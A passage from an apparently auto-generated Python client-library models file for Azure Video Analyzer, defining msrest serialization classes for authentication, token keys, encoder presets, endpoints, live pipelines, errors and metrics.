self.type = '#Microsoft.VideoAnalyzer.AudioEncoderAac' # type: str
class AuthenticationBase(msrest.serialization.Model):
"""Base class for access policies authentication methods.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: JwtAuthentication.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.JwtAuthentication': 'JwtAuthentication'}
}
def __init__(
self,
**kwargs
):
super(AuthenticationBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class CertificateSource(msrest.serialization.Model):
"""Base class for certificate sources.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: PemCertificateList.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.PemCertificateList': 'PemCertificateList'}
}
def __init__(
self,
**kwargs
):
super(CertificateSource, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class CheckNameAvailabilityRequest(msrest.serialization.Model):
"""The check availability request body.
:param name: The name of the resource for which availability needs to be checked.
:type name: str
:param type: The resource type.
:type type: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(CheckNameAvailabilityRequest, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.type = kwargs.get('type', None)
class CheckNameAvailabilityResponse(msrest.serialization.Model):
"""The check availability result.
:param name_available: Indicates if the resource name is available.
:type name_available: bool
:param reason: The reason why the given name is not available. Possible values include:
"Invalid", "AlreadyExists".
:type reason: str or ~video_analyzer.models.CheckNameAvailabilityReason
:param message: Detailed reason why the given name is available.
:type message: str
"""
_attribute_map = {
'name_available': {'key': 'nameAvailable', 'type': 'bool'},
'reason': {'key': 'reason', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(CheckNameAvailabilityResponse, self).__init__(**kwargs)
self.name_available = kwargs.get('name_available', None)
self.reason = kwargs.get('reason', None)
self.message = kwargs.get('message', None)
class CredentialsBase(msrest.serialization.Model):
"""Base class for credential objects.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: UsernamePasswordCredentials.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.UsernamePasswordCredentials': 'UsernamePasswordCredentials'}
}
def __init__(
self,
**kwargs
):
super(CredentialsBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class TokenKey(msrest.serialization.Model):
"""Key properties for JWT token validation.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: EccTokenKey, RsaTokenKey.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param kid: Required. JWT token key id. Validation keys are looked up based on the key id
present on the JWT token header.
:type kid: str
"""
_validation = {
'type': {'required': True},
'kid': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'kid': {'key': 'kid', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.EccTokenKey': 'EccTokenKey', '#Microsoft.VideoAnalyzer.RsaTokenKey': 'RsaTokenKey'}
}
def __init__(
self,
**kwargs
):
super(TokenKey, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.kid = kwargs['kid']
class EccTokenKey(TokenKey):
"""Required validation properties for tokens generated with Elliptical Curve algorithm.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param kid: Required. JWT token key id. Validation keys are looked up based on the key id
present on the JWT token header.
:type kid: str
:param alg: Required. Elliptical curve algorithm to be used: ES256, ES384 or ES512. Possible
values include: "ES256", "ES384", "ES512".
:type alg: str or ~video_analyzer.models.AccessPolicyEccAlgo
:param x: Required. X coordinate.
:type x: str
:param y: Required. Y coordinate.
:type y: str
"""
_validation = {
'type': {'required': True},
'kid': {'required': True},
'alg': {'required': True},
'x': {'required': True},
'y': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'kid': {'key': 'kid', 'type': 'str'},
'alg': {'key': 'alg', 'type': 'str'},
'x': {'key': 'x', 'type': 'str'},
'y': {'key': 'y', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EccTokenKey, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EccTokenKey' # type: str
self.alg = kwargs['alg']
self.x = kwargs['x']
self.y = kwargs['y']
class EdgeModuleEntity(ProxyResource):
"""The representation of an edge module.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:ivar edge_module_id: Internal ID generated for the instance of the Video Analyzer edge module.
:vartype edge_module_id: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'edge_module_id': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'edge_module_id': {'key': 'properties.edgeModuleId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EdgeModuleEntity, self).__init__(**kwargs)
self.edge_module_id = None
class EdgeModuleEntityCollection(msrest.serialization.Model):
"""A collection of EdgeModuleEntity items.
:param value: A collection of EdgeModuleEntity items.
:type value: list[~video_analyzer.models.EdgeModuleEntity]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[EdgeModuleEntity]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EdgeModuleEntityCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class EdgeModuleProvisioningToken(msrest.serialization.Model):
"""Provisioning token properties. A provisioning token allows for a single instance of Azure Video analyzer IoT edge module to be initialized and authorized to the cloud account. The provisioning token itself is short lived and it is only used for the initial handshake between IoT edge module and the cloud. After the initial handshake, the IoT edge module will agree on a set of authentication keys which will be auto-rotated as long as the module is able to periodically connect to the cloud. A new provisioning token can be generated for the same IoT edge module in case the module state lost or reset.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar expiration_date: The expiration date of the registration token. The Azure Video Analyzer
IoT edge module must be initialized and connected to the Internet prior to the token expiration
date.
:vartype expiration_date: ~datetime.datetime
:ivar token: The token blob to be provided to the Azure Video Analyzer IoT edge module through
the Azure IoT Edge module twin properties.
:vartype token: str
"""
_validation = {
'expiration_date': {'readonly': True},
'token': {'readonly': True},
}
_attribute_map = {
'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'},
'token': {'key': 'token', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EdgeModuleProvisioningToken, self).__init__(**kwargs)
self.expiration_date = None
self.token = None
class EncoderPresetBase(msrest.serialization.Model):
"""Base type for all encoder presets, which define the recipe or instructions on how the input content should be processed.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: EncoderCustomPreset, EncoderSystemPreset.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.EncoderCustomPreset': 'EncoderCustomPreset', '#Microsoft.VideoAnalyzer.EncoderSystemPreset': 'EncoderSystemPreset'}
}
def __init__(
self,
**kwargs
):
super(EncoderPresetBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class EncoderCustomPreset(EncoderPresetBase):
"""Describes a custom preset for encoding the input content using the encoder processor.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param audio_encoder: Describes a custom preset for encoding audio.
:type audio_encoder: ~video_analyzer.models.AudioEncoderBase
:param video_encoder: Describes a custom preset for encoding video.
:type video_encoder: ~video_analyzer.models.VideoEncoderBase
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'audio_encoder': {'key': 'audioEncoder', 'type': 'AudioEncoderBase'},
'video_encoder': {'key': 'videoEncoder', 'type': 'VideoEncoderBase'},
}
def __init__(
self,
**kwargs
):
super(EncoderCustomPreset, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EncoderCustomPreset' # type: str
self.audio_encoder = kwargs.get('audio_encoder', None)
self.video_encoder = kwargs.get('video_encoder', None)
class NodeBase(msrest.serialization.Model):
"""Base class for nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: ProcessorNodeBase, SinkNodeBase, SourceNodeBase.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.ProcessorNodeBase': 'ProcessorNodeBase', '#Microsoft.VideoAnalyzer.SinkNodeBase': 'SinkNodeBase', '#Microsoft.VideoAnalyzer.SourceNodeBase': 'SourceNodeBase'}
}
def __init__(
self,
**kwargs
):
super(NodeBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.name = kwargs['name']
class ProcessorNodeBase(NodeBase):
"""Base class for topology processor nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: EncoderProcessor.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.EncoderProcessor': 'EncoderProcessor'}
}
def __init__(
self,
**kwargs
):
super(ProcessorNodeBase, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.ProcessorNodeBase' # type: str
self.inputs = kwargs['inputs']
class EncoderProcessor(ProcessorNodeBase):
"""Encoder processor allows for encoding of the input content. For example, it can used to change the resolution from 4K to 1280x720.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
:param preset: Required. The encoder preset, which defines the recipe or instructions on how
the input content should be processed.
:type preset: ~video_analyzer.models.EncoderPresetBase
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
'preset': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
'preset': {'key': 'preset', 'type': 'EncoderPresetBase'},
}
def __init__(
self,
**kwargs
):
super(EncoderProcessor, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EncoderProcessor' # type: str
self.preset = kwargs['preset']
class EncoderSystemPreset(EncoderPresetBase):
"""Describes a built-in preset for encoding the input content using the encoder processor.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Name of the built-in encoding preset. Possible values include:
"SingleLayer_540p_H264_AAC", "SingleLayer_720p_H264_AAC", "SingleLayer_1080p_H264_AAC",
"SingleLayer_2160p_H264_AAC".
:type name: str or ~video_analyzer.models.EncoderSystemPresetType
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EncoderSystemPreset, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EncoderSystemPreset' # type: str
self.name = kwargs['name']
class Endpoint(msrest.serialization.Model):
"""The endpoint details.
All required parameters must be populated in order to send to Azure.
:param endpoint_url: The URL of the endpoint.
:type endpoint_url: str
:param type: Required. The type of the endpoint. Possible values include: "ClientApi".
:type type: str or ~video_analyzer.models.VideoAnalyzerEndpointType
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'endpoint_url': {'key': 'endpointUrl', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Endpoint, self).__init__(**kwargs)
self.endpoint_url = kwargs.get('endpoint_url', None)
self.type = kwargs['type']
class EndpointBase(msrest.serialization.Model):
"""Base class for endpoints.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: TlsEndpoint, UnsecuredEndpoint.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param credentials: Required. Credentials to be presented to the endpoint.
:type credentials: ~video_analyzer.models.CredentialsBase
:param url: Required. The endpoint URL for Video Analyzer to connect to.
:type url: str
:param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint
URL. This is an optional property, typically used when the endpoint is behind a firewall.
:type tunnel: ~video_analyzer.models.TunnelBase
"""
_validation = {
'type': {'required': True},
'credentials': {'required': True},
'url': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'credentials': {'key': 'credentials', 'type': 'CredentialsBase'},
'url': {'key': 'url', 'type': 'str'},
'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.TlsEndpoint': 'TlsEndpoint', '#Microsoft.VideoAnalyzer.UnsecuredEndpoint': 'UnsecuredEndpoint'}
}
def __init__(
self,
**kwargs
):
super(EndpointBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.credentials = kwargs['credentials']
self.url = kwargs['url']
self.tunnel = kwargs.get('tunnel', None)
class ErrorAdditionalInfo(msrest.serialization.Model):
"""The resource management error additional info.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar type: The additional info type.
:vartype type: str
:ivar info: The additional info.
:vartype info: any
"""
_validation = {
'type': {'readonly': True},
'info': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'info': {'key': 'info', 'type': 'object'},
}
def __init__(
self,
**kwargs
):
super(ErrorAdditionalInfo, self).__init__(**kwargs)
self.type = None
self.info = None
class ErrorDetail(msrest.serialization.Model):
"""The error detail.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar code: The error code.
:vartype code: str
:ivar message: The error message.
:vartype message: str
:ivar target: The error target.
:vartype target: str
:ivar details: The error details.
:vartype details: list[~video_analyzer.models.ErrorDetail]
:ivar additional_info: The error additional info.
:vartype additional_info: list[~video_analyzer.models.ErrorAdditionalInfo]
"""
_validation = {
'code': {'readonly': True},
'message': {'readonly': True},
'target': {'readonly': True},
'details': {'readonly': True},
'additional_info': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
'details': {'key': 'details', 'type': '[ErrorDetail]'},
'additional_info': {'key': 'additionalInfo', 'type': '[ErrorAdditionalInfo]'},
}
def __init__(
self,
**kwargs
):
super(ErrorDetail, self).__init__(**kwargs)
self.code = None
self.message = None
self.target = None
self.details = None
self.additional_info = None
class ErrorResponse(msrest.serialization.Model):
"""Common error response for all Azure Resource Manager APIs to return error details for failed operations. (This also follows the OData error response format.).
:param error: The error object.
:type error: ~video_analyzer.models.ErrorDetail
"""
_attribute_map = {
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(ErrorResponse, self).__init__(**kwargs)
self.error = kwargs.get('error', None)
class GroupLevelAccessControl(msrest.serialization.Model):
"""Group level network access control.
:param public_network_access: Whether or not public network access is allowed for specified
resources under the Video Analyzer account. Possible values include: "Enabled", "Disabled".
:type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess
"""
_attribute_map = {
'public_network_access': {'key': 'publicNetworkAccess', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(GroupLevelAccessControl, self).__init__(**kwargs)
self.public_network_access = kwargs.get('public_network_access', None)
class IotHub(msrest.serialization.Model):
"""The IoT Hub details.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param id: Required. The IoT Hub resource identifier.
:type id: str
:param identity: Required. The IoT Hub identity.
:type identity: ~video_analyzer.models.ResourceIdentity
:ivar status: The current status of the Iot Hub mapping.
:vartype status: str
"""
_validation = {
'id': {'required': True},
'identity': {'required': True},
'status': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'ResourceIdentity'},
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(IotHub, self).__init__(**kwargs)
self.id = kwargs['id']
self.identity = kwargs['identity']
self.status = None
class JwtAuthentication(AuthenticationBase):
"""Properties for access validation based on JSON Web Tokens (JWT).
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param issuers: List of expected token issuers. Token issuer is valid if it matches at least
one of the given values.
:type issuers: list[str]
:param audiences: List of expected token audiences. Token audience is valid if it matches at
least one of the given values.
:type audiences: list[str]
:param claims: List of additional token claims to be validated. Token must contains all claims
and respective values for it to be valid.
:type claims: list[~video_analyzer.models.TokenClaim]
:param keys: List of keys which can be used to validate access tokens. Having multiple keys
allow for seamless key rotation of the token signing key. Token signature must match exactly
one key.
:type keys: list[~video_analyzer.models.TokenKey]
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'issuers': {'key': 'issuers', 'type': '[str]'},
'audiences': {'key': 'audiences', 'type': '[str]'},
'claims': {'key': 'claims', 'type': '[TokenClaim]'},
'keys': {'key': 'keys', 'type': '[TokenKey]'},
}
def __init__(
self,
**kwargs
):
super(JwtAuthentication, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.JwtAuthentication' # type: str
self.issuers = kwargs.get('issuers', None)
self.audiences = kwargs.get('audiences', None)
self.claims = kwargs.get('claims', None)
self.keys = kwargs.get('keys', None)
class KeyVaultProperties(msrest.serialization.Model):
"""The details for accessing the encryption keys in Key Vault.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param key_identifier: Required. The URL of the Key Vault key used to encrypt the account. The
key may either be versioned (for example https://vault/keys/mykey/version1) or reference a key
without a version (for example https://vault/keys/mykey).
:type key_identifier: str
:ivar current_key_identifier: The current key used to encrypt Video Analyzer account, including
the key version.
:vartype current_key_identifier: str
"""
_validation = {
'key_identifier': {'required': True},
'current_key_identifier': {'readonly': True},
}
_attribute_map = {
'key_identifier': {'key': 'keyIdentifier', 'type': 'str'},
'current_key_identifier': {'key': 'currentKeyIdentifier', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(KeyVaultProperties, self).__init__(**kwargs)
self.key_identifier = kwargs['key_identifier']
self.current_key_identifier = None
class ListProvisioningTokenInput(msrest.serialization.Model):
"""The input parameters to generate registration token for the Azure Video Analyzer IoT edge module.
All required parameters must be populated in order to send to Azure.
:param expiration_date: Required. The desired expiration date of the registration token. The
Azure Video Analyzer IoT edge module must be initialized and connected to the Internet prior to
the token expiration date.
:type expiration_date: ~datetime.datetime
"""
_validation = {
'expiration_date': {'required': True},
}
_attribute_map = {
'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'},
}
def __init__(
self,
**kwargs
):
super(ListProvisioningTokenInput, self).__init__(**kwargs)
self.expiration_date = kwargs['expiration_date']
class LivePipeline(ProxyResource):
"""Live pipeline represents a unique instance of a live topology, used for real-time ingestion, archiving and publishing of content for a unique RTSP camera.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: The reference to an existing pipeline topology defined for real-time
content processing. When activated, this live pipeline will process content according to the
pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:param bitrate_kbps: Maximum bitrate capacity in Kbps reserved for the live pipeline. The
allowed range is from 500 to 3000 Kbps in increments of 100 Kbps. If the RTSP camera exceeds
this capacity, then the service will disconnect temporarily from the camera. It will retry to
re-establish connection (with exponential backoff), checking to see if the camera bitrate is
now below the reserved capacity. Doing so will ensure that one 'noisy neighbor' does not affect
other live pipelines in your account.
:type bitrate_kbps: int
:ivar state: Current state of the pipeline (read-only). Possible values include: "Inactive",
"Activating", "Active", "Deactivating".
:vartype state: str or ~video_analyzer.models.LivePipelineState
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameters values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can be optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'bitrate_kbps': {'key': 'properties.bitrateKbps', 'type': 'int'},
'state': {'key': 'properties.state', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(LivePipeline, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
self.state = None
self.parameters = kwargs.get('parameters', None)
class LivePipelineCollection(msrest.serialization.Model):
"""A collection of LivePipeline items.
:param value: A collection of LivePipeline items.
:type value: list[~video_analyzer.models.LivePipeline]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[LivePipeline]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(LivePipelineCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class LivePipelineOperationStatus(msrest.serialization.Model):
"""Used for tracking the status of an operation on the live pipeline.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The name of the live pipeline operation.
:vartype name: str
:ivar status: The status of the live pipeline operation.
:vartype status: str
:ivar error: The error details for the live pipeline operation.
:vartype error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'readonly': True},
'status': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(LivePipelineOperationStatus, self).__init__(**kwargs)
self.name = None
self.status = None
self.error = None
class LivePipelineUpdate(ProxyResource):
"""Live pipeline represents a unique instance of a live topology, used for real-time ingestion, archiving and publishing of content for a unique RTSP camera.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: The reference to an existing pipeline topology defined for real-time
content processing. When activated, this live pipeline will process content according to the
pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:param bitrate_kbps: Maximum bitrate capacity in Kbps reserved for the live pipeline. The
allowed range is from 500 to 3000 Kbps in increments of 100 Kbps. If the RTSP camera exceeds
this capacity, then the service will disconnect temporarily from the camera. It will retry to
re-establish connection (with exponential backoff), checking to see if the camera bitrate is
now below the reserved capacity. Doing so will ensure that one 'noisy neighbor' does not affect
other live pipelines in your account.
:type bitrate_kbps: int
:ivar state: Current state of the pipeline (read-only). Possible values include: "Inactive",
"Activating", "Active", "Deactivating".
:vartype state: str or ~video_analyzer.models.LivePipelineState
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameters values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can be optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'bitrate_kbps': {'key': 'properties.bitrateKbps', 'type': 'int'},
'state': {'key': 'properties.state', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(LivePipelineUpdate, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
self.state = None
self.parameters = kwargs.get('parameters', None)
class LogSpecification(msrest.serialization.Model):
"""A diagnostic log emitted by service.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The diagnostic log category name.
:vartype name: str
:ivar display_name: The diagnostic log category display name.
:vartype display_name: str
:ivar blob_duration: The time range for requests in each blob.
:vartype blob_duration: str
"""
_validation = {
'name': {'readonly': True},
'display_name': {'readonly': True},
'blob_duration': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'blob_duration': {'key': 'blobDuration', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(LogSpecification, self).__init__(**kwargs)
self.name = None
self.display_name = None
self.blob_duration = None
class MetricDimension(msrest.serialization.Model):
"""A metric dimension.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The metric dimension name.
:vartype name: str
:ivar display_name: The display name for the dimension.
:vartype display_name: str
:ivar to_be_exported_for_shoebox: Whether to export metric to shoebox.
:vartype to_be_exported_for_shoebox: bool
"""
_validation = {
'name': {'readonly': True},
'display_name': {'readonly': True},
'to_be_exported_for_shoebox': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'to_be_exported_for_shoebox': {'key': 'toBeExportedForShoebox', 'type': 'bool'},
}
def __init__(
self,
**kwargs
):
super(MetricDimension, self).__init__(**kwargs)
self.name = None
self.display_name = None
self.to_be_exported_for_shoebox = None
class MetricSpecification(msrest.serialization.Model):
"""A metric emitted by service.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The metric name.
:vartype name: str
:ivar display_name: The metric display name.
:vartype display_name: str
:ivar display_description: The metric display description.
:vartype display_description: str
:ivar unit: The metric unit. Possible values include: "Bytes", "Count", "Milliseconds".
:vartype unit: str or ~video_analyzer.models.MetricUnit
:ivar aggregation_type: The metric aggregation type. Possible values include: "Average",
"Count", "Total".
:vartype aggregation_type: str or ~video_analyzer.models.MetricAggregationType
:ivar lock_aggregation_type: The metric lock aggregation type. Possible values include:
"Average", "Count", "Total".
:vartype lock_aggregation_type: str or ~video_analyzer.models.MetricAggregationType
:param supported_aggregation_types: Supported aggregation types.
:type supported_aggregation_types: list[str]
:ivar dimensions: The metric dimensions.
:vartype dimensions: list[~video_analyzer.models.MetricDimension]
:ivar enable_regional_mdm_account: Indicates whether regional MDM account is enabled.
:vartype enable_regional_mdm_account: bool
:ivar source_mdm_account: The source MDM account.
:vartype source_mdm_account: str
